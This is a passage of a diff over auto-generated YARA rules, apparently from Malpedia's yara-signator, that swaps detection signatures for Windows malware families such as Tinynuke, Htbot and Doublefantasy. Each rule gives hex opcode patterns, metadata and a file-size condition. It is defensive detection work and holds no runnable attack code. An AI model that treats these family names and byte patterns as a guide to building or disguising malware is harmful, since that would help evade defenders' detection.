-		$sequence_2 = { 50 8d7720 e8???????? 8b9590fdffff 8b8584fdffff }
-		$sequence_3 = { e8???????? 8945f8 3bd8 0f841d010000 }
-		$sequence_4 = { 8d4701 3dffffff7f 0f87e8000000 03c0 3d00100000 722a }
-		$sequence_5 = { 83fa08 7202 8b3e 8d041b 50 ff75f8 }
-		$sequence_6 = { 33ff 33db 897de4 895de8 85f6 7421 }
-		$sequence_7 = { e8???????? 8b4de8 83c40c 83f908 7234 }
-		$sequence_8 = { 8bf1 8975b8 8975ac c745b000000000 c7461000000000 c7461400000000 c70600000000 }
-		$sequence_9 = { 8bd1 57 c70600000000 c74604ffff0000 8b4a1c 8bc1 }
+		$sequence_0 = { 8b45ec 85c0 740b 6a08 50 }
+		$sequence_1 = { 2bd9 2bf1 8bc3 46 }
+		$sequence_2 = { 33c0 660fd645d4 33db 8945d8 }
+		$sequence_3 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 }
+		$sequence_4 = { 6a00 ff15???????? 56 ff15???????? 56 ff15???????? }
+		$sequence_5 = { 75f3 8bf3 8a03 43 84c0 }
+		$sequence_6 = { 33c0 660fd645d4 33db 8945d8 895dd4 }
+		$sequence_7 = { 75f3 8bf3 8a03 43 84c0 75f9 2bde }
+		$sequence_8 = { c745dc00000000 33c0 660fd645d4 33db 8945d8 895dd4 }
+		$sequence_9 = { 8a0e 8d7601 884c32ff 84c9 75f3 8bf3 8a03 }
 
 	condition:
-		7 of them and filesize < 324608
+		7 of them and filesize < 851968
 }
-rule MALPEDIA_Win_Curator_Auto : FILE
+rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88dd85f1-9cc3-5f60-833e-59e5ff5c2a14"
+		id = "50fc15f3-1120-5098-a2b0-ef6606f64bfb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.curator_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "ce369866ebd7e0f8a7ef01400f189e7f18bf8531561abd861592d244202fec85"
+		logic_hash = "17fe086c6d5f4507ec1675a18ca14445f60cf526d184ed9a8460c468298fa68d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121283,32 +121289,32 @@ rule MALPEDIA_Win_Curator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4108 4889459f 488d5d8f 4883fa10 480f435d8f 4803d9 41b808000000 }
-		$sequence_1 = { 488b07 488d542420 488bcf ff9090000000 488bcd 48c1e903 488b4620 }
-		$sequence_2 = { 85c0 0f4ed0 e8???????? 488d15c2140400 488d4c2420 e8???????? cc }
-		$sequence_3 = { 5d c3 4883c202 488915???????? 0fbe0a 85c9 74bd }
-		$sequence_4 = { 8b45d8 e9???????? 0fbe42ff 488d4dd0 83c004 4863d0 488d05abbf0300 }
-		$sequence_5 = { 83e802 0f853ffaffff 660f6fa42400010000 660ffe2424 660f6fac24d0010000 660ffeac24d0000000 660f6fb424a0010000 }
-		$sequence_6 = { 4156 4157 4883ec50 488b7128 4c8d25880c0000 33ed 488bf9 }
-		$sequence_7 = { 488945e0 895128 488d0d332f0300 488b45d8 488908 488d0d950a0500 488b45d8 }
-		$sequence_8 = { 0fb68c2490000000 4c8d0501350300 4803da 4883f101 4803d9 482bfb 488bcb }
-		$sequence_9 = { ff15???????? 4885c0 7411 488bc8 ff15???????? 3bc6 0f84eb040000 }
+		$sequence_0 = { 50 8d45f0 64a300000000 8965e8 8b7d08 c745fc00000000 8b07 }
+		$sequence_1 = { a1???????? 33c4 89842428080000 8b4508 53 }
+		$sequence_2 = { 52 8d85c6f7ffff 50 e8???????? 8bbdb8f7ffff }
+		$sequence_3 = { 33c0 8d8decfdffff 51 8d95c8fdffff 52 8985ccfdffff }
+		$sequence_4 = { 50 ff15???????? 85c0 7516 56 8945f8 }
+		$sequence_5 = { 68???????? 57 ff15???????? 8bd8 3bdf 742e 53 }
+		$sequence_6 = { 8907 897704 8b8dbcf7ffff 890f 50 }
+		$sequence_7 = { 837e1400 750f 6a7f ff15???????? 33c0 5e 8be5 }
+		$sequence_8 = { 68???????? 33f6 68???????? 56 8975fc c745f801000000 ff15???????? }
+		$sequence_9 = { 6aff 51 8b4d0c 6804010000 51 e8???????? 83c410 }
 
 	condition:
-		7 of them and filesize < 1265664
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Neteagle_Auto : FILE
+rule MALPEDIA_Win_Htbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32895ae7-ce57-521b-b8af-c26cb59a6de4"
+		id = "39a927d2-1945-5991-992e-cc87b6814598"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neteagle_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htbot_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "cd9004d8f3e934bcdc5c7488fb3dbf59ca59052c62f38c8a57dd749c0498c5bb"
+		logic_hash = "d80214a974c7da7b11a6b3decefcabbf12f30dbe8a8667d77b9a26c8d44a14ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121322,32 +121328,32 @@ rule MALPEDIA_Win_Neteagle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b86040c0000 40 8d0c40 c704ce02000000 e9???????? 8b54242c }
-		$sequence_1 = { 8b4c241c 52 53 50 51 ff15???????? 85c0 }
-		$sequence_2 = { 8b461c 85c0 0f849e010000 8bce e8???????? 85c0 0f848f010000 }
-		$sequence_3 = { 8bf8 6804010000 897c2424 c744242804010000 c744242c01000000 e8???????? 8b8c2464010000 }
-		$sequence_4 = { 8b4b24 03c8 89542901 8b4b24 8b542438 03c8 89542905 }
-		$sequence_5 = { 6a17 50 8bcb e8???????? 8d4da0 6a0f 8d55e0 }
-		$sequence_6 = { e8???????? 8b470c 83c604 8b0430 85c0 75e1 33f6 }
-		$sequence_7 = { a1???????? 83f801 7f82 5f 5e 5b 8b4dfc }
-		$sequence_8 = { 68???????? 52 ffd5 83c408 8d4c2440 85c0 0f94c3 }
-		$sequence_9 = { 894d98 8b8de4feffff 89559c 8945a0 8d95e8feffff 6a64 8d45d8 }
+		$sequence_0 = { 6857000780 e8???????? 83c601 8d4e0a 3bcd 0f8db6000000 85f6 }
+		$sequence_1 = { 83c002 6685c9 75f5 2bc2 d1f8 0f88ce020000 }
+		$sequence_2 = { 8d7c241c 8d442420 c644246003 e8???????? 85c0 0f84e1000000 8d4900 }
+		$sequence_3 = { c68424b410000004 e8???????? 8b442430 8b00 8b8c24b8100000 8d542448 }
+		$sequence_4 = { 8b11 50 8b4204 ffd0 c64424340a 8b44241c }
+		$sequence_5 = { 51 8b4ef0 8b11 8b4210 83c6f0 89642428 8bdc }
+		$sequence_6 = { 8b4c2414 51 ff15???????? 8d54241c 52 }
+		$sequence_7 = { 8b11 8b4204 57 ffd0 83c510 896c2414 }
+		$sequence_8 = { 384802 7550 384803 744b 83c004 3808 7418 }
+		$sequence_9 = { 2bc1 d1f8 83f8ff 755c 3959f4 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Stresspaint_Auto : FILE
+rule MALPEDIA_Win_Kazyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "60972f0d-5b32-562d-b7a1-4042f30f34cb"
+		id = "8e63e9d7-0aa3-54bc-8958-5bb44d9fbb2a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stresspaint_auto.yar#L1-L150"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kazyloader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "d56631be02335c29e6f4a5ef8e07a5da331d1e0c248639e3a06714253e875bf3"
+		logic_hash = "34cc9a0cb8805c010ff93ad518256fe67686f6553b5dc947370b69715033db6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121361,38 +121367,32 @@ rule MALPEDIA_Win_Stresspaint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d542478 51 52 e8???????? 8b44244c }
-		$sequence_1 = { 8d542478 c6042b00 3bda 7505 }
-		$sequence_2 = { 0103 014510 294514 83665800 }
-		$sequence_3 = { 0106 83560400 837d1c00 7494 }
-		$sequence_4 = { 0103 014510 294674 8b4674 }
-		$sequence_5 = { 8d542901 52 6a1e 56 }
-		$sequence_6 = { 0107 115f04 3bcb 7508 }
-		$sequence_7 = { 8d542478 52 57 e8???????? 83c408 }
-		$sequence_8 = { 8d542478 f3ab 8b8c24a4000000 8b8424a0000000 }
-		$sequence_9 = { 0107 83570400 85c9 7508 }
-		$sequence_10 = { 8d542478 898c2498010000 8d8c2494010000 52 }
-		$sequence_11 = { 010b 8945fc 8bc2 83530400 }
-		$sequence_12 = { 0103 ebaa 8b442408 56 }
-		$sequence_13 = { 8d542474 51 55 52 8bce e8???????? }
-		$sequence_14 = { 0108 8b8e44010000 114804 8b4f18 }
-		$sequence_15 = { 8d542901 52 6a1f 56 }
+		$sequence_0 = { d2 9c 07 06 8e }
+		$sequence_1 = { 1309 1109 3a3fffffff 02 09 6f2700000a }
+		$sequence_2 = { 6f1a00000a 281b00000a 26 00 de00 }
+		$sequence_3 = { 8e 69 58 280100002b }
+		$sequence_4 = { 00 08 16 06 06 8e 69 }
+		$sequence_5 = { 00 1104 02 6f1f00000a 5a 1105 }
+		$sequence_6 = { 6f1400000a 740200001b 0c 1200 06 8e 69 }
+		$sequence_7 = { 58 91 1308 1108 20fd000000 59 }
+		$sequence_8 = { 282100000a 00 02 08 19 02 6f2200000a }
+		$sequence_9 = { 07 04 2804000006 0b 07 281200000a 6f1800000a }
 
 	condition:
-		7 of them and filesize < 1155072
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Darkdew_Auto : FILE
+rule MALPEDIA_Win_Hawking_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "915d3fba-ccdb-58ec-bef5-fbfe3e57f2e5"
+		id = "ec9f39f6-86ba-5455-97b7-92972ad75506"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkdew_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawking"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hawking_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "2001511710881b4d822d294ff1446e10aa21b9b50a4d4e2fae3fc5a2bc0825b8"
+		logic_hash = "38946ce524bb812dc9a51e3c54c74cdb8d87a613cbaf2402323bc2266d8ec447"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121406,32 +121406,32 @@ rule MALPEDIA_Win_Darkdew_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d7e01 3bfb 7ed0 83c8ff eb07 8b04f55c710110 5f }
-		$sequence_1 = { 7214 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87860f0000 }
-		$sequence_2 = { b991000000 8dbd70e2ffff 8bf2 f3a5 b991000000 }
-		$sequence_3 = { 6804010000 8d85b4fcffff 6a00 50 e8???????? 83c40c }
-		$sequence_4 = { 83fe10 8bbd68ffffff 0f43cf 8d5101 }
-		$sequence_5 = { c745e807000000 668945d4 83fa10 722c 8b4d9c 42 8bc1 }
-		$sequence_6 = { 8d85e4f7ffff f3a5 50 8d8528faffff b991000000 8bf3 8dbd18f9ffff }
-		$sequence_7 = { 8d9534fcffff 0f43ce 2bd1 8a01 8d4901 88440aff 84c0 }
-		$sequence_8 = { 83c404 83781408 7202 8b00 50 6a00 }
-		$sequence_9 = { eb07 8b0cc5645c0110 894de4 85c9 7455 8b4510 }
+		$sequence_0 = { 2c02 16 2a 06 }
+		$sequence_1 = { 06 6f2c00000a 26 06 6f2d00000a 6f2e00000a 750d000001 }
+		$sequence_2 = { 08 16 08 8e 69 6f2100000a }
+		$sequence_3 = { 2d04 26 14 2b05 }
+		$sequence_4 = { 281c00000a 02 07 6f1900000a 72ba010070 6f1a00000a 2807000006 }
+		$sequence_5 = { 0b 14 0c 732f00000a 0d 16 }
+		$sequence_6 = { 6f0e00000a 1200 280f00000a 2dde de0e 1200 fe160200001b }
+		$sequence_7 = { 2df6 06 6f06000006 de0c 6f3400000a 2801000006 }
+		$sequence_8 = { 0c 07 6f1900000a 72ba010070 }
+		$sequence_9 = { 03 282400000a 2801000006 732500000a 0a 06 }
 
 	condition:
-		7 of them and filesize < 279552
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Retefe_Auto : FILE
+rule MALPEDIA_Win_Tinynuke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8aa29e0c-c404-5a57-8eda-15f9ee27924e"
+		id = "26956b4b-2451-5deb-9643-68612b9d6236"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.retefe_auto.yar#L1-L279"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinynuke_auto.yar#L1-L293"
 		license_url = "N/A"
-		logic_hash = "2fe6220549475b9cb9f17de89d5a599ff0e604b2c25c7a541e74c1b0545a1a8f"
+		logic_hash = "19ead60aa2eb3196f69ad300611cd24757349dd6202d9e3aa3460ca7368338a0"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -121445,53 +121445,54 @@ rule MALPEDIA_Win_Retefe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8bf8 ffd6 85c0 }
-		$sequence_1 = { 68f5000000 50 ff15???????? b801000000 }
-		$sequence_2 = { e8???????? 6a08 e8???????? 894604 83c404 }
-		$sequence_3 = { 6a1c 6ae1 6aa5 6a00 6a14 6aea 6abe }
-		$sequence_4 = { 894604 83c404 8bc6 e8???????? }
-		$sequence_5 = { 6adb 6a1c 6ad8 6a2f 6ad1 6a0a }
-		$sequence_6 = { 6ada 6a53 6ac7 6a36 6acb 6a18 6ac4 }
-		$sequence_7 = { 8901 8b4e04 33c0 83c404 394104 }
-		$sequence_8 = { 8b4e04 40 3b4104 72ec }
-		$sequence_9 = { e8???????? 8b4e04 8901 8b4e04 }
-		$sequence_10 = { 51 8d9570efffff 52 50 50 50 6a01 }
-		$sequence_11 = { 6afa 6acb 6a12 6a79 }
-		$sequence_12 = { c1eb18 884101 c1ea10 33c0 }
-		$sequence_13 = { 50 e8???????? 88043e 46 83c404 3bf3 75ec }
-		$sequence_14 = { 0f8520010000 33c0 8ad8 8d8d04dcffff }
-		$sequence_15 = { 803800 740b 6a18 59 }
-		$sequence_16 = { 83e809 7443 83e801 0f8501010000 c745e014344100 8b4508 8bcf }
-		$sequence_17 = { 5d 5b c20800 833d????????00 }
-		$sequence_18 = { 8b7c2410 85f6 0f840b010000 53 e8???????? }
-		$sequence_19 = { 6a00 e8???????? 803d????????00 750c 8d859cdeffff }
-		$sequence_20 = { 8b0e 394104 761c 660f1f840000000000 8b11 8a88503e4100 }
-		$sequence_21 = { ff5004 8b4ddc 8b4104 895904 85c0 7406 8b08 }
-		$sequence_22 = { 8bf0 8b5508 83c9ff 83c2f0 f00fc14a0c }
-		$sequence_23 = { 8b5c2418 89442434 8b44241c 8d48f8 }
-		$sequence_24 = { 33c0 668945e8 8b45d4 886de5 8b1485a0bf4200 }
-		$sequence_25 = { 897de0 394508 7c1f 3934bd08d44500 }
-		$sequence_26 = { 57 8d3c85a8c14200 8b0f 85c9 740b 8d4101 f7d8 }
-		$sequence_27 = { 8b01 51 ff5008 8b4e0c 85c9 7406 }
-		$sequence_28 = { 7ead 8b0d???????? 8d857869ffff 6a00 }
-		$sequence_29 = { 0fb6c0 eb17 81fa00010000 7313 8a87ccb14200 08441619 }
+		$sequence_0 = { c3 55 8bec 817d0c00040000 }
+		$sequence_1 = { ff15???????? ff35???????? 8b7dfc 57 a3???????? ff15???????? ff35???????? }
+		$sequence_2 = { 5e 85c0 753c 56 8d45f8 }
+		$sequence_3 = { 8945f4 8d85d4feffff 50 ff15???????? }
+		$sequence_4 = { 83c418 a3???????? 5f 5e 5b c9 c3 }
+		$sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? }
+		$sequence_6 = { 53 56 57 33c0 33db 6a07 }
+		$sequence_7 = { 6a03 53 53 6800000080 50 ff15???????? a3???????? }
+		$sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f }
+		$sequence_9 = { 50 ff15???????? ff35???????? 8d85a4feffff 50 ff15???????? }
+		$sequence_10 = { a3???????? 68e2010000 68???????? 68???????? e8???????? }
+		$sequence_11 = { 8b02 8a00 3c0a 7409 3c0d }
+		$sequence_12 = { 6a2a 50 8945fc ff15???????? }
+		$sequence_13 = { ff15???????? a3???????? ff35???????? ff75ec ff15???????? }
+		$sequence_14 = { a3???????? ff35???????? ff75f8 ff15???????? }
+		$sequence_15 = { c70604000000 e8???????? eb18 83f803 7519 }
+		$sequence_16 = { 59 8d85d0fcffff 50 8d85d8feffff 50 ff15???????? ff35???????? }
+		$sequence_17 = { 8d45dc 50 ff15???????? 8d85d0fcffff 50 e8???????? }
+		$sequence_18 = { 8d85d4fdffff 50 ff15???????? ff35???????? 8d85d4fdffff 50 ff15???????? }
+		$sequence_19 = { ff15???????? 8b35???????? 8d430c 50 }
+		$sequence_20 = { e8???????? 8945fc 8b0f 83ec08 85c9 75d6 }
+		$sequence_21 = { c70424???????? e8???????? 83ec08 85c0 75d6 }
+		$sequence_22 = { 85c0 7422 8b0cb2 83ec08 03cf ba???????? }
+		$sequence_23 = { 891c24 89442408 e8???????? 0fb76f06 }
+		$sequence_24 = { c785e4fdffff00000000 c785e0fdffff01000000 f3ab ff15???????? 8d85e8fdffff 6804010000 }
+		$sequence_25 = { e8???????? 83ec08 89c3 c7042400000000 e8???????? }
+		$sequence_26 = { 5b c20800 891c24 e8???????? 83ec04 }
+		$sequence_27 = { 89bdb8fdffff ff15???????? 83bdbcfdffff01 7477 8b85c4fdffff }
+		$sequence_28 = { 83ec0c 31c0 83c43c 5b 5e }
+		$sequence_29 = { 837c243401 7537 c744241400000000 c744241000000000 c744240c00000000 c7442408???????? c744240400000000 }
+		$sequence_30 = { 85c0 75d6 31db 8d742600 c70424???????? }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 1196032
 }
-rule MALPEDIA_Win_Skip20_Auto : FILE
+rule MALPEDIA_Win_Bhunt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a4637b8-f789-501b-b30e-9b5c38cc0f0d"
+		id = "d4af1ffc-8c62-52d5-b468-d6549e9f3fe4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skip20_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bhunt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "37102bdc96bcca2b357e821094999917631ae97c09451ffb93720795a4f9e949"
-		score = 75
+		logic_hash = "00be53192993cb157d23710f27883aec97e607f299251d85f4a360507da1c6b0"
+		score = 50
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -121504,32 +121505,32 @@ rule MALPEDIA_Win_Skip20_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb74114 8b540824 4803d3 8b7c0820 4885d2 0f840b1d0000 }
-		$sequence_1 = { 488d0c40 4c8d0584fe0100 4d8b04c8 488bd7 }
-		$sequence_2 = { 894c2430 89542428 488d15fd2c0100 e9???????? 4c896c2450 66c744245cff25 }
-		$sequence_3 = { 488d0db5220100 e8???????? eb4a 4c896c2450 440fb74c2472 440fb7442470 }
-		$sequence_4 = { 4c8d254c540100 488b0d???????? bf01000000 897c2460 }
-		$sequence_5 = { 8bd6 81e200004000 747e 41ff4c2418 781e }
-		$sequence_6 = { ffc9 7432 ffc9 0f85150a0000 814e0400000002 4180e304 }
-		$sequence_7 = { e8???????? 0fb64732 ffc3 3bd8 72dd 4c21aea0000000 0fb74f18 }
-		$sequence_8 = { 7418 0fbae119 730a f68424b800000008 7508 41be01000000 }
-		$sequence_9 = { 0fb744247c 89442438 0fb74c247a 894c2430 0fb7542478 89542428 488d15652f0100 }
+		$sequence_0 = { f6c643 f65f47 146d 80739aea 7cf9 ed cf }
+		$sequence_1 = { ff7510 8d442414 50 8984240c070000 e8???????? 8bb42404070000 68???????? }
+		$sequence_2 = { 50 e8???????? 8d86001c0000 50 8d85b6f3ffff 50 e8???????? }
+		$sequence_3 = { 6613c6 8b07 84c8 f8 8dbf04000000 66f7c76d13 33c3 }
+		$sequence_4 = { 83c40c 6a03 bbfb020000 e8???????? 50 56 e8???????? }
+		$sequence_5 = { 83e01f c1f905 8b0c8d00e04900 c1e006 8d44010c 50 e8???????? }
+		$sequence_6 = { 85c0 751f 8b4518 0118 33c0 5f 5e }
+		$sequence_7 = { 46 56 68???????? 56 56 e8???????? 85c0 }
+		$sequence_8 = { fc 8e04a5???????? 33ef aa 3417 ed b877eefc1d }
+		$sequence_9 = { 2522e9fb64 794f 8b00 9a5250f0069a5c 2640 2e9b 1a489f }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 19161088
 }
-rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
+rule MALPEDIA_Win_Doublefantasy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dc190002-e772-5121-92cd-702f57df5a52"
+		id = "ba30a5f3-35d1-5f03-be08-9b3934519f6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kgh_spy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublefantasy_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "e5faa391b98537b62aa0655593e441fa8bf7b12383d96ea8cca680986ba0c716"
+		logic_hash = "1a0409b74271064d42217a7a2221717756e298061c677390a0017c2a29a907a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121543,34 +121544,40 @@ rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 488b8c24a0000000 ff15???????? 0fb605???????? 88842480010000 488d842481010000 488bf8 }
-		$sequence_1 = { 488d0dd0fd0000 e8???????? c744244000000000 c744244800000000 488d442460 488d0def150100 488bf8 }
-		$sequence_2 = { ff15???????? 4889442468 48837c246800 7507 32c0 e9???????? 48c744243800000000 }
-		$sequence_3 = { 448d4202 e8???????? 8bcb e8???????? 85c0 0f84bc020000 488d0517bf0000 }
-		$sequence_4 = { 75eb 488b442430 488b8c2490000000 4803c8 488bc1 }
-		$sequence_5 = { e8???????? 488905???????? 48833d????????00 7504 32c0 eb26 ba855d05a6 }
-		$sequence_6 = { 488d8424f0030000 488bf8 33c0 b908020000 f3aa 4c8d0df7e30000 }
-		$sequence_7 = { 89442428 488d8424300e0000 4889442420 448bc9 4c8d8424300a0000 }
-		$sequence_8 = { 488b442428 8b4c2430 894808 4863442424 4889442440 488b7c2430 33c0 }
-		$sequence_9 = { ff15???????? 0fb605???????? 888424a0030000 488d8424a1030000 488bf8 33c0 }
+		$sequence_0 = { bfd3360000 57 6a40 8b35???????? ffd6 }
+		$sequence_1 = { 8b442404 0fb608 c1e902 8a91908c2700 8b4c2408 8811 33d2 }
+		$sequence_2 = { e8???????? 8bcb 2bc8 51 ff7514 }
+		$sequence_3 = { 50 6a00 56 8907 e8???????? 83c40c }
+		$sequence_4 = { 66ab be???????? 8dbd9ffaffff a5 }
+		$sequence_5 = { ff15???????? eb72 56 6a00 ff75e0 e8???????? ff75e4 }
+		$sequence_6 = { 83e20f c1e202 0bd6 8a92908c2700 eb02 b23d 837c241002 }
+		$sequence_7 = { ff750c ff7508 e8???????? 83c414 8945e0 }
+		$sequence_8 = { 8a80ad8c2700 eb02 32c0 84c0 }
+		$sequence_9 = { 891485a4ab2700 40 3bc1 72f1 }
+		$sequence_10 = { 8a92908c2700 885101 7e1c 0fb67002 33d2 8a5001 c1ee06 }
+		$sequence_11 = { 8a80908c2700 eb02 b03d 884103 }
+		$sequence_12 = { 33c0 85c9 7616 8da42400000000 8d50fd 891485a4ab2700 40 }
+		$sequence_13 = { b9d2360000 51 52 48 }
+		$sequence_14 = { c68094a3270000 ff35???????? ff35???????? e8???????? 83c414 e8???????? }
+		$sequence_15 = { ff37 ff750c 8b460c 03c3 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 207872
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Volgmer_Auto : FILE
+rule MALPEDIA_Win_Sarhust_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c708d481-8667-53f5-aa6f-d4a1c7cf85b4"
+		id = "1f82eb40-7df1-5fcd-972c-65036c547e83"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.volgmer_auto.yar#L1-L402"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sarhust_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "76496bf022136cb4a0da9750dca0578c8d8bf2a12423d01c51f00f5c1f22514f"
+		logic_hash = "6be2d8277b702e649c294d54fc6ec35174e3abad1edfa4501c6a9845d06e8218"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121582,68 +121589,34 @@ rule MALPEDIA_Win_Volgmer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4533c0 498bd5 33c9 c744242800000008 }
-		$sequence_1 = { 7454 33d2 488d4c2434 41b804040000 e8???????? 448d4606 }
-		$sequence_2 = { 7406 488bcf ff5588 4533c9 4533c0 33d2 }
-		$sequence_3 = { 4889442420 4c8d442448 418d5108 41ffd4 4c8d8da0030000 498bce }
-		$sequence_4 = { 4883c9ff 48ffc1 803c0800 75f7 66ffc1 488d8560030000 }
-		$sequence_5 = { 8801 488d4901 ffc0 3d00010000 7cf1 6644899600010000 }
-		$sequence_6 = { e8???????? e8???????? e8???????? c705????????04000000 }
-		$sequence_7 = { 488d8d270d0000 0f280d???????? 33d2 0fb705???????? 41b8c5010000 0f1185e40c0000 }
-		$sequence_8 = { 488d8d20050000 ff542460 488bcb ff542468 8bc6 }
-		$sequence_9 = { 488d8d400f0000 e8???????? 8bd6 c68435400f000000 488d8d400f0000 }
